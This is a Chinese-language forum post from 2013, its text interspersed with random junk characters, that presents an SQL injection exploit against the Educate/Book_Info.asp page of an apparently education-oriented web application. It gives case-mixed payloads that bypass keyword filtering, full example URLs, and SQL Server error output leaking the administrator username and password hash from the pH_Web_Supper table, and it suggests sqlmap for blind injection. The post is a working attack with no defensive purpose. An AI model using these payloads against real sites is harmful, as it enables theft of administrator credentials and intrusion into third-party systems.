漏洞出现在Educate/Book_Info.asp
$ Y! b. }' { H u
$ s5 d# K' K4 G: _4 u此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出9 p' ?. ^) \. S2 Y2 l% J/ E4 X& Z) M
$ U$ \) i6 j& ` v
exp:如下$ e' {0 W+ S# e0 T
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). @0 b" I% L# d% _, _
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ V" E% ?' e( y8 ~3 S
( U* {& J x* R2 N( j9 v$ S3 s
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. F. k; x& w; n3 G ; f3 C& i; W d& H/ e6 [' }
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'1 q" J" N: w2 h! E% L' j- Y
! G# d% ?& D& j/ p将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。7 d. Y7 Q% u, b( {. t
* B; `% U; P7 m+ \! h% \
/Educate/Book_Info.asp,行 80 r6 s) `& p6 z% Y/ ~0 A6 m+ z# N
+ E$ ?; u- j, D# n0 F( l3 |
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
) f+ }1 d( ^ n J / I& m) i; @- u7 X$ V" l
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
' X4 w Z9 `3 @. k0 X* ?! r5 r
3 ~% k6 {7 P; r4 |" N将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。+ n5 A* B* C( \0 @9 \( e
$ O0 h/ b0 b" k/Educate/Book_Info.asp,行 86 g0 F" I! w, o( L% |1 {
|
发表于 2013-2-16 21:44:16
收藏
支持
反对